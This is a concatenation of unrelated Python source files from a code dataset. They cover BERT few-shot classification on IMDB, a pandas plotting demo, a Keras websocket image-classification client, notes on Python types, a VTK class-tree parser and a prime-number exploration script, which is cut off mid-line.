extracted_features_list = np.zeros((len(input_text_list), embedding_size))\n for i, input_text in enumerate(input_text_list):\n extracted_features = get_bert_embedding_single(model, tokenizer, input_text)\n extracted_features_list[i, :] = extracted_features\n return extracted_features_list\n\ndef get_sentence_list(txt_path):\n 
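# assumption: each line of train.txt/test.txt looks like 'label<TAB>sentence';\n    # keep the last tab-separated field and strip the trailing newline with [:-1]\n   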
lines = open(txt_path, 'r').readlines()\n    lines = [x.split('\\t')[-1][:-1] for x in lines]\n    return lines\n\n# extracted_features_list = get_bert_embedding(model, tokenizer, ['hello i am jason', 'i like machine learning'])\n\nimport config\nfrom utils import *\nfrom utils_model import *\n\ndataset_name = \"imdb\"\ndata_folder = config.data_folders[dataset_name]\nnum_classes = config.num_classes_dict[dataset_name]\nssl_folder = data_folder.joinpath(\"ssl\")\nword2vec_pickle = f\"word2vec/{dataset_name}_w2v.pkl\"\nword2vec = load_pickle(word2vec_pickle)\n\ntrain_txt_path = data_folder.joinpath(\"train.txt\")\ntest_txt_path = data_folder.joinpath(\"test.txt\")\n\ntrain_lines = get_sentence_list(train_txt_path)\ntest_lines = get_sentence_list(test_txt_path)\n\ntrain_extracted_features = get_bert_embedding(model, tokenizer, train_lines)\ntest_extracted_features = get_bert_embedding(model, tokenizer, test_lines)\n\ntrain_x, train_y = get_x_y(train_txt_path, num_classes, word2vec_len=300, input_size=40, word2vec=word2vec)\ntest_x, test_y = get_x_y(test_txt_path, num_classes, word2vec_len=300, input_size=40, word2vec=word2vec)\ntest_y_list = one_hot_numpy_to_list(test_y)\n\nk_per_class_to_n_voters = {\t1: 1,\n                            2: 1,\n                            3: 1, \n                            5: 3,\n                            10: 3,\n                            20: 5}\n\nfor k_per_class, n_voters in k_per_class_to_n_voters.items():\n    calculate_few_shot_acc(train_extracted_features, train_y, test_extracted_features, test_y, num_classes, k_per_class, n_voters)\n\nk_per_class_svm = [100, 200, 500, 1000]\n\nfor k_per_class in k_per_class_svm:\n    calculate_svm_acc(train_extracted_features, train_y, test_extracted_features, test_y, num_classes, k_per_class)","sub_path":"code/3imdb_6c_bert.py","file_name":"3imdb_6c_bert.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"228616207","text":"#coding:iso-8859-9 Türkçe\r\n# p_32502a.py: Example of plotting a pandas data frame as a line chart.\r\n\r\nimport matplotlib.pyplot as mp\r\nimport pandas as pd\r\n\r\nmp.style.use (\"dark_background\")\r\n\r\nşehirler = {\"ad\":\r\n    [\"Londra\", \"Berlin\", \"Madrid\", \"Roma\", \"Paris\", \"Viyana\", \"Buçarest\",\r\n     \"Hamburg\", \"Budapeşte\", \"Varşova\", \"Barselona\", \"Münih\", \"Milano\"],\r\n            \"nüfus\":\r\n    [8615246, 3562166, 3165235, 2874038, 2273305, 1805681, 1803425,\r\n     1760433, 1754000, 1740119, 1602386, 1493900, 1350680],\r\n            \"yüzölçümü\":\r\n    [1572, 891.85, 605.77, 1285, 105.4, 414.6, 228,\r\n     755, 525.2, 517, 101.9, 310.4, 181.8] }\r\n\r\nveriÇerçevesi = pd.DataFrame (şehirler,\r\n                              columns=[\"nüfus\", \"yüzölçümü\"],\r\n                              index=şehirler [\"ad\"] )\r\n\r\nprint (\"Şehirler veri çerçevesi:\\n\", veriÇerçevesi, sep=\"\")\r\n\r\nveriÇerçevesi [\"yüzölçümü\"] *=1000\r\nveriÇerçevesi.plot()\r\nmp.show()\r\n#-------------------------------------------------------------------------------------------------------\r\n\r\nveriÇerçevesi.plot (\r\n    xticks=range (len (veriÇerçevesi.index)),\r\n    use_index=True) # city names will be shown in full on the x-axis...\r\nmp.show() # if the city names overlap, maximize the window, or...\r\n#-------------------------------------------------------------------------------------------------------\r\n\r\nveriÇerçevesi.plot (\r\n    xticks=range (len (veriÇerçevesi.index)),\r\n    use_index=True,\r\n    rot=90) # city names will be shown vertically on the x-axis...\r\nmp.show() # if the city names are cut off below, increase Configure-subplots->bottom...\r\n","sub_path":"Bernd Klein (520) ile 
Python/p_32502a.py","file_name":"p_32502a.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"584286264","text":"import json\nimport websocket\nimport time\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nimport os\nimport numpy as np\nimport pandas as pd\nimport sys\n\n\nImageData_path = 'ImageData'\nModel_path = 'ModelPath'\nflag = True\nheader = {\n \"CommandHandler\": \"AIColor\",\n \"CommandName\": \"RegistComm\",\n \"ParamsJson\": \"\"} # 注册信息需要为 Json 格式\n#header = dict(header)\nheader = json.dumps(header)\nimg_type = 'jpg'\npath = \"./\"\nmodel_path = \"F:/jupyter/pycharm/keras_tutorial/pyqt5_tool_demo/ALcolor/ModelPath/1555812970.2107625.h5\"\nmodel = ''\n\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\n\ndef on_message(ws, message):\n global img_type, model_path, path\n print(time.ctime())\n message = json.loads(message)\n img_name = message['msg']['Msg']['ImgFile'] # 得到的是图片的文件名,不包括路径和后缀\n img_path = path + img_name + '.' +img_type # 图片集路径 + 图片名 + . + 后缀\n if os.path.exists(img_path) == False: # 判断文件是否存在\n print(\"图片文件不存在,请检查图片名或图片类型\") # 通信协议上要约定若文件不存在时的情况\n img_array = img_processing(img_path) # 将图片转换成张量\n result = img_predict(model, img_array) # 对图片进行预测\n # 发送回去服务端 待写。。。。。\n #############\n pass\n\n print(np.argmax(result))\n print(time.ctime())\n if message['msg']['Msg']['Wood'] == 'end': # 通信协议加上结束运行的参数\n ws.close()\n\n\n\ndef on_error(ws, error):\n print(error)\n\n\ndef on_close(ws):\n print(\"### closed ###\")\n\n\ndef on_open(ws):\n def run(*args):\n ws.send(header)\n print(\"thread terminating...\")\n\n thread.start_new_thread(run, ())\n\n\n\ndef guide_txt():\n \"\"\"\n 信息提示语\n :return:\n \"\"\"\n global add, img_type, path, model\n\n # 服务器开启提示语\n print(\"AI COLOR 服务\")\n print(\"请确认服务端是否开启 yes/no:\")\n print(\"1: yes\", \"2: no\", sep='\\n')\n start_flag = input()\n while 1:\n if start_flag == '1':\n break\n else:\n print(\"请开启后重试\")\n start_flag = input()\n print(\"请输入服务器地址: ip:port\") # 从配置文件中读取,若有新输入,保存\n print(\"历史记录:\", \"1: xx\", \"2: xx\", sep='\\n')\n add = '127.0.0.1:2019'#input()\n add = 'ws://' + add\n\n # 选择图片类型\n print(\"数据集文件名为 ImageData:\")\n print(\"请选择本次识别图像的类型\")\n configure_content = pd.read_csv(\"./configure.csv\") # 配置文件内容\n img_type_dict = dict()\n for i, content in enumerate(list(configure_content['img_type'])):\n print(i, \":\", content)\n img_type_dict[i] = content\n while 1:\n try:\n img_type_flag = int(eval(input(\"请选择\")))\n break\n except:\n print(\"请输入数字\")\n while 1:\n try:\n if img_type_flag in list(img_type_dict.keys()):\n # print(img_type_flag)\n img_type = img_type_dict[img_type_flag]\n print(\"所选图片类型为:%s\" % img_type)\n break\n else:\n print(\"请重新选择\")\n img_type_flag = int(eval(input(\"请选择\")))\n except:\n print(\"重试\")\n\n\n # 读取图片集路径\n now_path = os.getcwd()\n a = 1\n n = len(now_path.split(\"\\\\\"))\n while not (ImageData_path in os.listdir(now_path)):\n #print(\"1:\", now_path)\n a += 1\n n = len(now_path.split(\"\\\\\")[-1]) + 1\n now_path = now_path[:-n]\n if a == n-2:\n print(\"请检查图片路径 %s 是否存在\" % ImageData_path)\n print(\"系统 5s 后退出...\")\n time.sleep(5)\n try:\n os._exit(0)\n except:\n print('Program is dead.')\n path = now_path + \"\\\\\" + ImageData_path + str(\"\\\\\") # 图片的路径,当前路径找不到,会一直往上找\n #print(\"图片路径:\", path)\n\n\n # 获取模型路径 当前路径找不到,会一直往上找\n model_path = os.getcwd()\n a = 1\n n = len(model_path.split(\"\\\\\"))\n while not (Model_path in os.listdir(model_path)):\n 
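# walk up one directory per pass (drop the last path component) until the\n        # ModelPath folder appears; the counter below is a rough guard against\n        # climbing past the filesystem root\n       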
#print(now_path)\n a += 1\n n = len(model_path.split(\"\\\\\")[-1]) + 1\n model_path = model_path[:-n]\n if a == n - 2:\n print(\"请检查模型路径 %s 是否存在\" % Model_path)\n print(\"系统 5s 后退出...\")\n time.sleep(5)\n try:\n os._exit(0)\n except:\n print('Program is dead.')\n model_path = model_path + \"\\\\\" + Model_path + \"\\\\\"\n\n # 从配置文件中读取模型文件名\n model_dict = dict()\n for i, content in enumerate(list(configure_content['model'])):\n print(i, \":\", content)\n model_dict[i] = content\n while 1:\n try:\n model_name_flag = int(eval(input(\"请选择\")))\n break\n except:\n print(\"请输入数字\")\n while 1:\n try:\n if model_name_flag in list(model_dict.keys()):\n # print(img_type_flag)\n model_name = model_dict[model_name_flag]\n print(\"所选的模型为:%s\" % model_name)\n break\n else:\n print(\"请重新选择\")\n img_type_flag = int(eval(input(\"请选择\")))\n except:\n print(\"重试\")\n\n #model_name = '1555812970.2107625.h5'\n\n # 获取模型,获取不到就会直接退出\n try:\n model_path = model_path + model_name # 模型的路径(F:\\jupyter\\pycharm\\keras_tutorial\\pyqt5_tool_demo\\ALcolor\\)+模型的名字\n model = load_model(model_path) # 模型读取,放在这里性能更好\n except:\n print(\"无法找到模型,请重试...\")\n print(\"系统 5s 后退出...\")\n time.sleep(5)\n try:\n os._exit(0)\n except:\n print('Program is dead.')\n\n\ndef img_processing(img_path, target_size=150):\n img = image.load_img(img_path, target_size=(target_size, target_size))\n img_array = image.img_to_array(img)\n img_array = img_array / 255.\n img_array = img_array.reshape(-1, target_size, target_size, 3)\n return img_array\n\ndef img_predict(model, img_array):\n result = model.predict(img_array)\n return result\n\n\nif __name__ == \"__main__\":\n guide_txt()\n websocket.enableTrace(False) # 不显示报文\n ws = websocket.WebSocketApp(url=add, # 'ws://127.0.0.1:2019'\n on_message=on_message,\n on_error=on_error,\n on_close=on_close)\n ws.on_open = on_open\n ws.run_forever()\n\n\n\n","sub_path":"pycharm/keras_tutorial/pyqt5_tool_demo/AIcolor/pyqt5_demo_v10.py","file_name":"pyqt5_demo_v10.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"136062174","text":"#int\ninteger_number = 90\n\n#浮点\nfloat_number = 90.4\n \n#复数\ncomplex_number = 10 + 10j\n \n#list 序列\nsample_list = [1,2,3,'abc']\n \n#dictionary 字典\nsample_dic = {\"key\":value, 2:3}\n \n#tuple 只读的序列\nsample_tuple = (1,3,\"ab\")\n \n#嵌套\nsample_nest = [(1,2,3),{1:2,3:4,'key':[1,2]},3]\n\n#everythind is object\n'str str'.split() #['str', 'str']\n1..is_integer() #True\nis_integer(1) #True\n1.0.is_integer() #False\n[3, 2, 1].sort()\nsort([2, 1, 3])\n\n#if True: elif flag2: else:\n\nfor i in range(0, 1):\n print(i)\n\nfor i in ['a', 'b', 'c']:\n print(i)\n\n \n\n","sub_path":"doc/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"452559121","text":"#\n# Created by: Henk Dreuning\n# Student number: 10550461\n# Date: 08-06-2016\n#\n\nfrom vtk import *\nfrom PipelineObject import *\nfrom copy import deepcopy\n\n# Class that wraps a VTK class in the classTree and determines its\n# characteristics.\nclass TreeObject():\n def __init__(self, classType, eo):\n self.classType = classType\n self.eo = eo\n\n self.isAbstract = None\n self.implemented = None\n \n self.subclasses = None\n self.implementedSubclasses = None\n self.acceptsCache = {}\n self.onOffMethods = []\n self.setToMethods = []\n self.setValueMethods = []\n\n self.categories = []\n\n self.buildSubtree()\n 
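# note: buildSubtree() must come first - it sets isAbstract, which\n        # parseMethods() checks before instantiating a dummy node\n       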
self.parseMethods()\n\n def parseMethods(self):\n # Only parse methods if this is not an abstract class.\n if self.isAbstract:\n return\n \n dummyNode = self.classType()\n\n # Get methods of the different types.\n setValueMethods, setToMethods = utils.getSetMethods(dir(dummyNode))\n onOffMethods = utils.getOnOffMethods(dir(dummyNode))\n getMethods = utils.getGetMethods(dir(dummyNode))\n\n # Group their accompanying 'get' methods.\n setValueMethods, ogm1 = self.groupGetMethods(\"setValueMethod\", setValueMethods, getMethods)\n setToMethods, ogm2 = self.groupGetMethods(\"setToMethod\", setToMethods, getMethods)\n onOffMethods, ogm3 = self.groupGetMethods(\"onOffMethod\", onOffMethods, getMethods)\n\n # Note: setValueMethods, setToMethods and onOffMethods now contain\n # tuples with (setValueMethod, GetMethod), (setToMethod, GetMethod)\n # and (onOffMethod, GetMethod) respectively.\n\n # Remove unused (obsolete) 'get' methods.\n obsoleteGetMethods = ogm1 + ogm2 + ogm3\n getMethods = self.removeObsoleteGetMethods(obsoleteGetMethods, getMethods)\n setValueMethods = self.removeObsoleteSetValueMethods(onOffMethods,\n setToMethods, setValueMethods)\n\n # Group all setTo methods that operate on the same property.\n # Idem for OnOff methods.\n # Determine return and argument types for setValue methods.\n self.parseSetToMethods(setToMethods, dummyNode)\n self.parseOnOffMethods(onOffMethods, dummyNode)\n self.parseSetValueMethods(setValueMethods, dummyNode)\n\n def parseSetToMethods(self, setToMethods, dummyNode):\n # Group all setTo methods that operate on the same property.\n\n attributes = {}\n for setMethod, getMethod in setToMethods:\n # Take \"Get\" off the front\n attributeName = getMethod[3:]\n\n # Add to the list of Set*To* methods for this attribute.\n if attributeName in attributes:\n attributes[attributeName][\"setToMethods\"].append([setMethod, False])\n else:\n # Also save the current (default) value. 
The accompanying\n            # Set*To* method is set as selected later.\n                attributes[attributeName] = {\"getMethod\": getMethod,\n                                             \"setToMethods\": [[setMethod, False]]}\n\n        toRemove = []\n\n        # Set the currently 'active' (default) Set*To* methods as selected.\n        for attribute, methods in attributes.items():\n\n            getMethod = methods[\"getMethod\"]\n            defaultValue = getattr(dummyNode, getMethod)()\n\n            for i, [setToMethod, isSelected] in enumerate(methods[\"setToMethods\"]):\n                # Set this value and check if it equals default\n                try:\n                    getattr(dummyNode, setToMethod)()\n                except:\n                    # Skip this option\n                    # print \"Skipping\", setToMethod, getMethod, self.classType.__name__\n                    toRemove.append((attribute, i))\n                    continue\n\n                value = getattr(dummyNode, getMethod)()\n\n                if value == defaultValue:\n                    # Set as selected \n                    methods[\"setToMethods\"][i][1] = True\n                    break\n\n        # Remove the skipped options, highest indices first so that earlier\n        # deletions do not shift the positions of entries still to be removed\n        for attribute, i in sorted(toRemove, key=lambda pair: pair[1], reverse=True):\n            del attributes[attribute][\"setToMethods\"][i]\n\n        self.setToMethods = attributes\n\n    def parseOnOffMethods(self, onOffMethods, dummyNode):\n        # Group all onOff methods that operate on the same property.\n        # Only saves property's name and the getMethod.\n\n        onOffMethodsDict = {}\n\n        for i, (attributeName, getMethod) in enumerate(onOffMethods):\n            # Select default value\n            value = getattr(dummyNode, getMethod)()\n            onOffMethodsDict[attributeName] = [getMethod, value]\n\n        self.onOffMethods = onOffMethodsDict\n\n    def parseSetValueMethods(self, setValueMethods, dummyNode):\n        # Determine return and argument types for setValue methods.\n\n        setValueMethodsDict = {}\n        \n        # For experiments: check if this is a vtkContourFilter,\n        # used to add the 'SetValue' method manually.\n        isContourFilter = False\n        if self.classType == vtkContourFilter:\n            isContourFilter = True\n\n\n        for setMethod, getMethod in setValueMethods:\n            methodSignatures = utils.getMethodSignature(dummyNode, setMethod)\n            setTypes = utils.evalTypes(methodSignatures, setMethod)\n\n            methodSignatures = utils.getMethodSignature(dummyNode, getMethod)\n            getTypes = utils.evalTypes(methodSignatures, getMethod)\n\n            # getTypes and setType are of the form:\n            # [returntype, (argument type, argument type, ...)]\n\n            # Currently only the first method signature is used.\n\n            basicTypes = [int, float, str]\n            \n            if (getTypes[0][0] in basicTypes and getTypes[0][1] == \"void\"\n                and setTypes[0][1] in basicTypes):\n                value = getattr(dummyNode, getMethod)()\n                setValueMethodsDict[setMethod] = {\"getMethod\": getMethod,\n                                                  \"value\": value,\n                                                  \"getReturnType\": getTypes[0][0],\n                                                  \"getParameterTypes\": getTypes[0][1],\n                                                  \"setReturnType\": setTypes[0][0],\n                                                  \"setParameterTypes\": setTypes[0][1]}\n            \n            # For experiments: 'manually' add SetValue method if this is a\n            # vtkContourFilter.\n            if isContourFilter and setMethod == \"SetValue\":\n                setValueMethodsDict = self.addSetValueContourFilter(\n                    setValueMethodsDict, dummyNode, setMethod, getMethod)\n        \n        self.setValueMethods = setValueMethodsDict\n\n    # For experiments: if this is a vtkContourFilter, add the 'SetValue'\n    # method manually.\n    def addSetValueContourFilter(self, setValueMethodsDict, dummyNode, setMethod, getMethod):\n        value = getattr(dummyNode, getMethod)(0)\n        setValueMethodsDict[setMethod] = {\"getMethod\": getMethod,\n                                          \"value\": value,\n                                          \"getReturnType\": float,\n                                          \"getParameterTypes\": \"void\",\n                                          \"setReturnType\": \"void\",\n                                          \"setParameterTypes\": float}\n\n        return setValueMethodsDict\n\n    def groupGetMethods(self, methodType, methodNames, getMethods):\n        # Group the 
accompanying 'get' method for setTo/setValue/onOff methods.\n\n obsoleteGetMethods = []\n newMethodNames = []\n\n # Iterate over a copy of methodNames, as we might modify it in the else\n # clause.\n for methodName in methodNames[:]:\n getMethod = self.renameToGetMethod(methodType, methodName)\n\n if getMethod in getMethods:\n # change methodName into a tuple containing:\n # (setValueMethod/setToMethod/onOffMethod, getMethod)\n newMethodNames.append((methodName, getMethod))\n\n # Remove getMethod from getMethods, since value is of no\n # interest to show anywhere else.\n obsoleteGetMethods.append(getMethod)\n\n else:\n # setValueMethod has no get method, don't show it\n methodNames.remove(methodName)\n\n return newMethodNames, obsoleteGetMethods\n\n def removeObsoleteGetMethods(self, obsoleteGetMethods, getMethods):\n # Remove obsolete get methods\n for getMethod in obsoleteGetMethods:\n # Doubles can exist (i.e. both MethodOn/MethodOff and SetMethod\n # exist), so catch ValueError (not in list).\n try:\n getMethods.remove(getMethod)\n except ValueError:\n pass\n\n return getMethods\n\n def removeObsoleteSetValueMethods(self, onOffMethods, setToMethods, setValueMethods):\n # Remove Set methods if there already are On/Off\n # methods.\n for attributeName, getMethod in onOffMethods:\n if (\"Set\" + attributeName, getMethod) in setValueMethods:\n setValueMethods.remove((\"Set\" + attributeName, getMethod))\n # print \"removed obsolete Set Method\", \"Set\" + attributeName\n\n # Remove Set methods if there already are\n # SetTo methods.\n for _, getMethod in setToMethods:\n setMethod = \"Set\" + getMethod[3:]\n if (setMethod, getMethod) in setValueMethods:\n setValueMethods.remove((setMethod, getMethod))\n # print \"removed obsolete Set Method\", setMethod\n\n return setValueMethods\n\n\n def renameToGetMethod(self, methodType, methodName):\n # Given a setTo, setValue or onOff method, get the name of the\n # accompanying 'get' method.\n\n if (methodType == \"setValueMethod\"):\n return \"G\" + methodName[1:]\n\n elif (methodType == \"setToMethod\"):\n baseMethodName = re.sub(\"To\\w+$\", \"\", methodName)\n return \"G\" + baseMethodName[1:]\n \n elif (methodType == \"onOffMethod\"):\n return \"Get\" + methodName\n\n\n def buildSubtree(self):\n # This will create TreeObjects for all subclasses (recursively)\n # and determine if this vtk class (type) is abstract and implemented.\n # The tree can be used for selecting a new node to add to the pipeline. 
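Recursion happens implicitly: constructing a TreeObject for each subclass calls buildSubtree() again.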
\n subclasses = self.classType.__subclasses__()\n self.subclasses = []\n\n for subClassType in subclasses:\n subClassTreeObject = TreeObject(subClassType, self.eo)\n self.subclasses.append(subClassTreeObject)\n \n self._determineIsAbstract()\n # This will set both self.implemented and\n # fill self.implementedSubclasses\n self._isImplemented()\n\n def _determineIsAbstract(self):\n # Instantiate to test if class is abstract\n try:\n _ = self.classType()\n self.isAbstract = False \n except (TypeError, NotImplementedError):\n self.isAbstract = True\n\n def _isImplemented(self):\n if self.implemented == None:\n self._determineIsImplemented()\n\n return self.implemented\n\n def _determineIsImplemented(self):\n implemented = None\n \n # Test subclasses, first check if they have been built\n if self.subclasses == None:\n message = \"Subclasses not built, cannot check if implemented\"\n raise Exception(message)\n else:\n self.implementedSubclasses = []\n\n # For each class, check if it is implemented\n implemented = False\n for subClass in self.subclasses:\n if subClass._isImplemented():\n implemented = True\n self.implementedSubclasses.append(subClass)\n\n # Concrete classes are always implemented (by themselves), but the\n # previous loop is executed anyways to fill 'implementedSubclasses'.\n if not self.isAbstract:\n implemented = True\n\n self.implemented = implemented\n\n def _getImplementedSubclasses(self):\n if self.implementedSubclasses == None:\n self._determineIsImplemented()\n\n return self.implementedSubclasses\n\n def listImplementedSubclasses(self):\n for i, subClass in enumerate(self.implementedSubclasses):\n print(\"[{}]: {}\".format(i, subClass.classType.__name__))\n\n def acceptsAsInput(self, outputPort, prevNodeTypeName=None, prevNode=None):\n # Only test self if self is not abstract. 
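Abstract classes cannot be instantiated, so there is no instance to probe.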
\n if self.isAbstract:\n return False\n\n # First try if a result was cached\n if prevNodeTypeName != None:\n try:\n return self.acceptsCache[prevNodeTypeName]\n except KeyError:\n pass\n\n # Test if self has the right amount of input/output ports.\n \n dummyNode = self.classType()\n\n # Only list single output objects (for linear pipeline)\n if dummyNode.GetNumberOfOutputPorts() > 1:\n return False\n\n # Only list no input objects for source objects\n if outputPort == None:\n if dummyNode.GetNumberOfInputPorts() != 0:\n return False\n else:\n # No input needed, so list this one\n return True\n\n # Only use objects with one or more input ports (for non-source\n # objects).\n else:\n if dummyNode.GetNumberOfInputPorts() < 1:\n return False\n\n # The object has the correct amount of input and output ports, check\n # if the output is accepted now:\n\n # Reset error handler/observer\n self.eo.ErrorOccurred()\n\n # Test if self accepts outputPort as input\n dummyNode.SetInputConnection(prevNode.vtkInstanceCall(\"GetOutputPort\"))\n dummyNode.UpdateInformation()\n\n\n if not self.eo.ErrorOccurred():\n # Cache the result\n if prevNodeTypeName != None:\n self.acceptsCache[prevNodeTypeName] = True\n \n return True\n\n # Cache the result\n if prevNodeTypeName != None:\n self.acceptsCache[prevNodeTypeName] = False\n \n return False\n\n def createHashTable(self, hashTable):\n # Adds this TreeObject and its subclasses to a hash table/dictionary\n # with class names/TreeObjects as key/value pairs.\n\n className = self.classType.__name__\n hashTable[className] = self\n for subClass in self.subclasses:\n hashTable = subClass.createHashTable(hashTable)\n\n return hashTable\n\n def createNode(self):\n # Create a pipelineObject with which wraps a vtkInstance of the class\n # that this TreeObject represents, and return it.\n\n # This method should not be called for abstract classes.\n if self.isAbstract:\n raise Exception(\"Cannot instantiate abstract class.\")\n\n # Instantiate vtkInstance\n vtkInstance = self.classType()\n\n # Copy attribute methods and current (default) values\n methods = [deepcopy(self.setToMethods), deepcopy(self.onOffMethods),\n deepcopy(self.setValueMethods)]\n\n # Wrap in pipelineObject\n pipelineObject = PipelineObject(vtkInstance, methods)\n\n # print \"Created node:\", pipelineObject, pipelineObject.vtkInstance\n return pipelineObject\n\n def setCategories(self, categories, mapping):\n # Determine the categories that this class belongs to and store it.\n\n className = self.classType.__name__\n categories = self.checkCategory(className, categories, mapping)\n\n for subClass in self.subclasses:\n categories = subClass.setCategories(categories, mapping)\n \n return categories\n \n def checkCategory(self, className, categories, mapping):\n # Determine the categories that this class belongs to.\n\n categorized = False\n \n for category in categories.keys():\n if category in className:\n categorized = True\n if type(categories[category]) == list:\n self.categories.append(category)\n categories[category].append(className)\n else:\n categories[category] = self.checkCategory(className,\n categories[category], mapping)\n\n if not categorized:\n if \"Miscellaneous\" not in categories:\n categories[\"Miscellaneous\"] = []\n\n categories[\"Miscellaneous\"].append(className)\n # If self.categories is going to be used, it should be set here\n # as well.\n\n return 
categories","sub_path":"TreeObject.py","file_name":"TreeObject.py","file_ext":"py","file_size_in_byte":16934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"468380523","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 13 20:10:41 2018\r\n\r\n@author: Ty Stinson.\r\nHello, this is the Prime Project. This program allows us to explore the beauty of prime numbers.\r\nJust press play to open up an interactive menu.\r\n\"\"\"\r\n\r\n\r\nimport math\r\nimport turtle as t\r\nfrom turtle import *\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom scipy import stats\r\nimport math \r\n\r\n\r\n\r\n\r\n#Calculates the greatest common denominator between two integers\r\ndef GCD(a,b):\r\n r = a % b\r\n if(r != 0):\r\n return GCD(b,r)\r\n else:\r\n return b\r\n \r\n \r\n#Generates the set of prime number within the range given then returns a sorted list\r\ndef prime(n):\r\n primes = set()\r\n composites = set()\r\n count = 2\r\n while(count <= n):\r\n if count not in composites:\r\n primes.add(count)\r\n i = count\r\n while(count * i <= n):\r\n multiple = count * i\r\n if multiple not in composites:\r\n composites.add(multiple)\r\n i +=1 \r\n if count == 2:\r\n count +=1\r\n else:\r\n count += 2\r\n return sorted(primes)\r\n\r\n \r\n#Tests the primality of an integer using a trial division \r\ndef trialdivision(n):\r\n factors = []\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if n % i == 0:\r\n if i in prime(n):\r\n factors.append(i)\r\n if(len(factors)==0):\r\n print(\"This number is a prime\")\r\n else:\r\n print(\"This composite number has the following prime factors\")\r\n print(factors)\r\n \r\n #Performs the factorization of an integer using trial division \r\ndef factorization(n):\r\n factors = []\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if n % i == 0:\r\n if i in prime(n):\r\n factors.append(i)\r\n if(len(factors)==0):\r\n print(\"This number is a prime\")\r\n else:\r\n print(\"This composite number has the following prime factors\")\r\n print(factors)\r\n\r\n#Tests the primality of an integer using the Sieve of Eratosthenes\r\ndef primalitysieve(n):\r\n primes = prime(n)\r\n if n in primes:\r\n print(\"This number is a prime\")\r\n else:\r\n print(\"This number is a composite\")\r\n \r\n \r\ndef distribution(n):\r\n end1 = 0\r\n end3 = 0 \r\n end5 = 0\r\n end7 = 0\r\n end9 = 0\r\n end1to1 = 0\r\n end1to3 = 0\r\n end1to5 = 0\r\n end1to7 = 0\r\n end1to9 = 0\r\n end3to1 = 0\r\n end3to3 = 0\r\n end3to5 = 0\r\n end3to7 = 0\r\n end3to9 = 0\r\n end5to1 = 0\r\n end5to3 = 0\r\n end5to5 = 0\r\n end5to7 = 0\r\n end5to9 = 0\r\n end7to1 = 0\r\n end7to3 = 0\r\n end7to5 = 0\r\n end7to7 = 0\r\n end7to9 = 0\r\n end9to1 = 0\r\n end9to3 = 0\r\n end9to5 = 0\r\n end9to7 = 0\r\n end9to9 = 0\r\n twinprime = 0\r\n twinprimelist = []\r\n primeaxis = []\r\n rangeaxis = []\r\n count = 1\r\n \r\n primes = prime(n)\r\n primes = prime(n)\r\n \r\n #This part of the program analyzes the distribution of primes\r\n for i in range(len(primes)):\r\n primename = str(primes[i])\r\n if primename[-1] == '1':\r\n end1+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end1to1+=1\r\n if nextprimename[-1] == '3':\r\n end1to3+=1\r\n if nextprimename[-1] == '5':\r\n end1to5+=1\r\n if nextprimename[-1] == '7':\r\n end1to7+=1\r\n if nextprimename[-1] == '9':\r\n end1to9+=1\r\n if primename[-1] == '3':\r\n end3+=1\r\n if i+1 < len(primes):\r\n 
nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end3to1+=1\r\n if nextprimename[-1] == '3':\r\n end3to3+=1\r\n if nextprimename[-1] == '5':\r\n end3to5+=1\r\n if nextprimename[-1] == '7':\r\n end3to7+=1\r\n if nextprimename[-1] == '9':\r\n end3to9+=1\r\n if primename[-1] == '5':\r\n end5+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end5to1+=1\r\n if nextprimename[-1] == '3':\r\n end5to3+=1\r\n if nextprimename[-1] == '5':\r\n end5to5+=1\r\n if nextprimename[-1] == '7':\r\n end5to7+=1\r\n if nextprimename[-1] == '9':\r\n end5to9+=1\r\n \r\n if primename[-1] == '7':\r\n end7+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end7to1+=1\r\n if nextprimename[-1] == '3':\r\n end7to3+=1\r\n if nextprimename[-1] == '5':\r\n end7to5+=1\r\n if nextprimename[-1] == '7':\r\n end7to7+=1\r\n if nextprimename[-1] == '9':\r\n end7to9+=1\r\n \r\n \r\n \r\n \r\n if primename[-1] == '9':\r\n end9+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end9to1+=1\r\n if nextprimename[-1] == '3':\r\n end9to3+=1\r\n if nextprimename[-1] == '5':\r\n end9to5+=1\r\n if nextprimename[-1] == '7':\r\n end9to7+=1\r\n if nextprimename[-1] == '9':\r\n end9to9+=1\r\n \r\n #This portion of the method calculates the twin primes in a given range.\r\n if primes[i] != 2:\r\n if i+1 < len(primes):\r\n \r\n if primes[i+1] == primes[i]+2:\r\n twinprime+=1\r\n pair = []\r\n pair.append(primes[i])\r\n pair.append(primes[i+1])\r\n twinprimelist.append(pair)\r\n \r\n print(\"Within this range there are \" + str(twinprime) + \" pairs of twin primes\")\r\n print(\"These are the twin primes: \" + str(twinprimelist))\r\n # This part of the function generates graph showing how it scales\r\n while(count <= 100000):\r\n rangeaxis.append(count)\r\n primecount = prime(count)\r\n primeaxis.append(len(primecount))\r\n count= count+100\r\n plt.scatter(rangeaxis,primeaxis)\r\n plt.xlabel(\"Range\")\r\n plt.ylabel(\"Amount of Prime\")\r\n plt.title(\"The Amount of Prime vs Range\")\r\n plt.show()\r\n \r\n print(\"end1\" + \" \" + str(end1/len(primes)))\r\n print(\"end1to1\" 